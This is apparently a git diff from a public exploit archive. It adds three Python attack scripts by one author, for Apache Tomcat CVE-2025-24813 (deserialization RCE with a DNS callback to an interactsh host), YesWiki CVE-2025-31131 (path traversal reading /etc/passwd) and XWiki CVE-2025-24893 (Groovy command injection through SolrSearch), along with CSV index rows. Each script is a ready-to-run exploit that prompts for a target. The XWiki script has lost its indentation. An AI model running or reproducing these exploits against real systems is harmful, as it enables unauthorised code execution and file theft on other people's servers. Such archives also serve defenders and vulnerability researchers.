diff --git a/exploits/multiple/webapps/52134.txt b/exploits/multiple/webapps/52134.txt new file mode 100644 index 000000000..8c4a763ff --- /dev/null +++ b/exploits/multiple/webapps/52134.txt @@ -0,0 +1,63 @@ +# Exploit Title: Apache Tomcat Path Equivalence - Remote Code Execution +# Exploit Author: Al Baradi Joy +# CVE: CVE-2025-24813 +# Date: 2025-04-06 +# Vendor Homepage: https://tomcat.apache.org/ +# Software Link: https://tomcat.apache.org/download-90.cgi +# Version: Apache Tomcat < 11.0.3 / 10.1.35 / 9.0.98 +# Tested on: Apache Tomcat 10.1.33 +# CVSS: 9.8 (CRITICAL) +# CWE: CWE-44, CWE-502 +# Reference: +https://scrapco.de/blog/analysis-of-cve-2025-24813-apache-tomcat-path-equivalence-rce.html + +import requests +import random +import string +import sys + +def rand_filename(length=6): + return ''.join(random.choices(string.ascii_lowercase, k=length)) + +def generate_payload(interact_url): + # Java serialized payload gadget triggering DNS interaction + return f'\xac\xed\x00\x05...' # Replace with actual gadget bytes or +generator + +def exploit(target, interact_url): + filename = rand_filename() + put_url = f"{target}/{filename}.session" + get_url = f"{target}/{filename}" + headers = { + "Content-Range": "bytes 0-452/457", + "Content-Type": "application/octet-stream" + } + payload = generate_payload(interact_url) + + print("[+] Exploit for CVE-2025-24813") + print("[+] Made By Al Baradi Joy\n") + print(f"[+] Uploading payload to: {put_url}") + r1 = requests.put(put_url, data=payload, headers=headers) + if r1.status_code == 201: + print("[+] Payload uploaded successfully.") + else: + print(f"[-] Upload failed with status: {r1.status_code}") + return + + print(f"[+] Triggering payload via: {get_url}") + cookies = {"JSESSIONID": f".{filename}"} + r2 = requests.get(get_url, cookies=cookies) + print(f"[+] Trigger request sent. Check for DNS callback to: +{interact_url}") + +if __name__ == "__main__": + # Display banner first + print("[+] Exploit for CVE-2025-24813") + print("[+] Made By Al Baradi Joy\n") + + # Ask the user for the target domain and interact URL + target_url = input("Enter the target domain (e.g., http://localhost:8080): +") + interact_url = input("Enter your interactsh URL: ") + + exploit(target_url, interact_url) \ No newline at end of file diff --git a/exploits/multiple/webapps/52135.txt b/exploits/multiple/webapps/52135.txt new file mode 100644 index 000000000..07099cb9f --- /dev/null +++ b/exploits/multiple/webapps/52135.txt @@ -0,0 +1,64 @@ +# Exploit Title: YesWiki < 4.5.2 - Unauthenticated Path Traversal +# Exploit Author: Al Baradi Joy +# Exploit Date: April 6, 2025 +# CVE ID: CVE-2025-31131 +# Vendor Homepage: https://yeswiki.net/ +# Software Link: https://github.com/YesWiki/yeswiki +# Affected Version: < 4.5.2 +# Tested On: YesWiki 4.5.1 on Ubuntu 22.04 +# Vulnerability Type: Unauthenticated Path Traversal (LFI) +# CVSS Score: 8.6 (High) +# CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N +# Description: +# YesWiki before version 4.5.2 is vulnerable to unauthenticated path +traversal via the 'squelette' parameter. +# A remote attacker can exploit this issue to read arbitrary files on the +server, such as /etc/passwd. + +import requests +import sys + +def banner(): + print("=" * 80) + print(" YesWiki < 4.5.2 - Unauthenticated Path Traversal +(CVE-2025-31131)") + print(" Exploit Author: Al Baradi Joy") + print("=" * 80) + +def exploit(target, filename="/etc/passwd"): + if not target.startswith("http"): + target = "http://" + target + + traversal = "../" * 8 + encoded_file = filename.replace("/", "%2f") + payload = +f"/?UrkCEO/edit&theme=margot&squelette={traversal}{encoded_file}&style=margot.css" + url = target.rstrip("/") + payload + + try: + print(f"[+] Target: {target}") + print(f"[+] Attempting to read: {filename}") + response = requests.get(url, timeout=10) + + if response.status_code == 200 and "root:" in response.text: + print("[+] Exploit successful. File contents:\n") + print(response.text) + else: + print("[!] Exploit failed or file not readable.") + print(f"Status Code: {response.status_code}") + if len(response.text) < 200: + print(f"Response:\n{response.text}") + except requests.exceptions.RequestException as e: + print(f"[!] Request failed: {e}") + +if __name__ == "__main__": + banner() + if len(sys.argv) < 2: + print(f"Usage: python3 {sys.argv[0]} [file_to_read]") + print(f"Example: python3 {sys.argv[0]} http://victim.com +/etc/passwd") + sys.exit(1) + + target_url = sys.argv[1] + file_to_read = sys.argv[2] if len(sys.argv) > 2 else "/etc/passwd" + exploit(target_url, file_to_read) \ No newline at end of file diff --git a/exploits/multiple/webapps/52136.txt b/exploits/multiple/webapps/52136.txt new file mode 100644 index 000000000..59b4f8ba4 --- /dev/null +++ b/exploits/multiple/webapps/52136.txt @@ -0,0 +1,97 @@ +# Exploit Title: XWiki Platform - Remote Code Execution +# Exploit Author: Al Baradi Joy +# Exploit Date: April 6, 2025 +# CVE ID: CVE-2025-24893 +# Vendor Homepage: https://www.xwiki.org/ +# Software Link: https://github.com/xwiki/xwiki-platform +# Version: Affected versions up to and including XWiki 15.10.10 +# Tested Versions: XWiki 15.10.10 +# Vulnerability Type: Remote Code Execution (RCE) +# CVSS Score: 9.8 (Critical) +# CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H +# Description: +# XWiki Platform suffers from a critical vulnerability where any guest user +can +# execute arbitrary code remotely through the SolrSearch endpoint. This can +lead +# to a full server compromise, including the ability to execute commands on +the +# underlying system. The vulnerability impacts the confidentiality, +integrity, +# and availability of the XWiki installation. The issue has been patched in +XWiki +# versions 15.10.11, 16.4.1, and 16.5.0RC1. +# Proof of Concept: Yes +# Categories: XWiki, Remote Code Execution, CVE-2025, RCE +# References: +# - GHSA Advisory: https://github.com/advisories/GHSA-rr6p-3pfg-562j +# - NVD CVE Details: https://nvd.nist.gov/vuln/detail/CVE-2025-24893 +# - GitHub Exploit Link: +https://github.com/a1baradi/Exploit/blob/main/CVE-2025-24893.py + +import requests + +# Banner +def display_banner(): +print("="*80) +print("Exploit Title: CVE-2025-24893 - XWiki Platform Remote Code +Execution") +print("Exploit Author: Al Baradi Joy") +print("GitHub Exploit: +https://github.com/a1baradi/Exploit/blob/main/CVE-2025-24893.py") +print("="*80) + +# Function to detect the target protocol (HTTP or HTTPS) +def detect_protocol(domain): +https_url = f"https://{domain}" +http_url = f"http://{domain}" + +try: +response = requests.get(https_url, timeout=5, allow_redirects=True) +if response.status_code < 400: +print(f"[✔] Target supports HTTPS: {https_url}") +return https_url +except requests.exceptions.RequestException: +print("[!] HTTPS not available, falling back to HTTP.") + +try: +response = requests.get(http_url, timeout=5, allow_redirects=True) +if response.status_code < 400: +print(f"[✔] Target supports HTTP: {http_url}") +return http_url +except requests.exceptions.RequestException: +print("[✖] Target is unreachable on both HTTP and HTTPS.") +exit(1) + +# Exploit function +def exploit(target_url): +target_url = detect_protocol(target_url.replace("http://", +"").replace("https://", "").strip()) +exploit_url = +f"{target_url}/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22cat%20/etc/passwd%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d" + +try: +print(f"[+] Sending request to: {exploit_url}") +response = requests.get(exploit_url, timeout=10) + +# Check if the exploit was successful +if response.status_code == 200 and "root:" in response.text: +print("[✔] Exploit successful! Output received:") +print(response.text) +else: +print(f"[✖] Exploit failed. Status code: +{response.status_code}") + +except requests.exceptions.ConnectionError: +print("[✖] Connection failed. Target may be down.") +except requests.exceptions.Timeout: +print("[✖] Request timed out. Target is slow or unresponsive.") +except requests.exceptions.RequestException as e: +print(f"[✖] Unexpected error: {e}") + +# Main execution +if __name__ == "__main__": +display_banner() +target = input("[?] Enter the target URL (without http/https): +").strip() +exploit(target) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 49e50baa9..9245b6df5 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11708,6 +11708,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 51447,exploits/multiple/webapps/51447.py,"Apache Superset 2.0.0 - Authentication Bypass",2023-05-23,MaanVader,webapps,multiple,,2023-05-23,2023-05-23,0,CVE-2023-27524,,,,, 48143,exploits/multiple/webapps/48143.py,"Apache Tomcat - AJP 'Ghostcat File Read/Inclusion",2020-02-20,YDHCUI,webapps,multiple,,2020-02-27,2020-03-02,0,CVE-2020-1938,,,,,https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi/blob/8bd38f4cf22331ecf4e48096a78c5931509c26be/CNVD-2020-10487-Tomcat-Ajp-lfi.py 49039,exploits/multiple/webapps/49039.rb,"Apache Tomcat - AJP 'Ghostcat' File Read/Inclusion (Metasploit)",2020-11-13,SunCSR,webapps,multiple,,2020-11-13,2020-11-13,1,CVE-2020-1938,,,,, +52134,exploits/multiple/webapps/52134.txt,"Apache Tomcat 11.0.3 - Remote Code Execution",2025-04-07,"Al Baradi Joy",webapps,multiple,,2025-04-07,2025-04-07,0,CVE-2025-24813,,,,, 10292,exploits/multiple/webapps/10292.txt,"Apache Tomcat 3.2.1 - 404 Error Page Cross-Site Scripting",2009-12-01,MustLive,webapps,multiple,,2009-11-30,2010-07-09,1,,,,,http://www.exploit-db.comjakarta-tomcat-3.2.1.tar.gz, 29435,exploits/multiple/webapps/29435.txt,"Apache Tomcat 5.5.25 - Cross-Site Request Forgery",2013-11-04,"Ivano Binetti",webapps,multiple,,2013-11-06,2013-11-06,0,CVE-2013-6357;OSVDB-99375,,,,,http://www.webapp-security.com/2013/11/apache-tomcat-5-5-25-deployundeploystartstop-applications/ 50119,exploits/multiple/webapps/50119.txt,"Apache Tomcat 9.0.0.M1 - Cross-Site Scripting (XSS)",2021-07-13,"Central InfoSec",webapps,multiple,,2021-07-13,2021-07-13,0,CVE-2019-0221,,,,, @@ -12427,7 +12428,9 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 34237,exploits/multiple/webapps/34237.txt,"Xplico 0.5.7 - 'add.ctp' Cross-Site Scripting (2)",2010-07-02,"Marcos Garcia & Maximiliano Soler",webapps,multiple,,2010-07-02,2014-08-02,1,,,,,,https://www.securityfocus.com/bid/41322/info 49073,exploits/multiple/webapps/49073.txt,"xuucms 3 - 'keywords' SQL Injection",2020-11-19,icekam,webapps,multiple,,2020-11-19,2020-11-19,0,CVE-2020-28091,,,,, 49437,exploits/multiple/webapps/49437.txt,"Xwiki CMS 12.10.2 - Cross Site Scripting (XSS)",2021-01-18,"Karan Keswani",webapps,multiple,,2021-01-18,2021-01-18,0,,,,,, +52136,exploits/multiple/webapps/52136.txt,"XWiki Platform 15.10.10 - Remote Code Execution",2025-04-07,"Al Baradi Joy",webapps,multiple,,2025-04-07,2025-04-07,0,CVE-2025-24893,,,,, 17111,exploits/multiple/webapps/17111.txt,"Yaws-Wiki 1.88-1 (Erlang) - Persistent / Reflective Cross-Site Scripting",2011-04-04,"Michael Brooks",webapps,multiple,,2011-04-04,2016-10-27,0,OSVDB-78072;OSVDB-71717;OSVDB-71716;CVE-2011-5025;OSVDB-71715,,,,http://www.exploit-db.comyaws-1.88.tar.gz,https://sitewat.ch/en/Advisory/4 +52135,exploits/multiple/webapps/52135.txt,"YesWiki 4.5.1 - Unauthenticated Path Traversal",2025-04-07,"Al Baradi Joy",webapps,multiple,,2025-04-07,2025-04-07,0,CVE-2025-31131,,,,, 10752,exploits/multiple/webapps/10752.txt,"Yonja - Arbitrary File Upload",2009-12-28,indoushka,webapps,multiple,80,2009-12-27,,0,,,,,, 10431,exploits/multiple/webapps/10431.txt,"Zabbix Agent < 1.6.7 - Remote Bypass",2009-12-14,Nicob,webapps,multiple,80,2009-12-13,,1,CVE-2009-4502;OSVDB-60956,,,,http://www.exploit-db.comzabbix_agents_1.1_Solaris5.9_i386.tar_.gz, 10432,exploits/multiple/webapps/10432.txt,"Zabbix Server - Multiple Vulnerabilities",2009-12-14,Nicob,webapps,multiple,80,2009-12-13,2016-10-27,1,CVE-2009-4501;CVE-2009-4499;CVE-2009-4498;OSVDB-60968;OSVDB-60966;OSVDB-60965,,,,,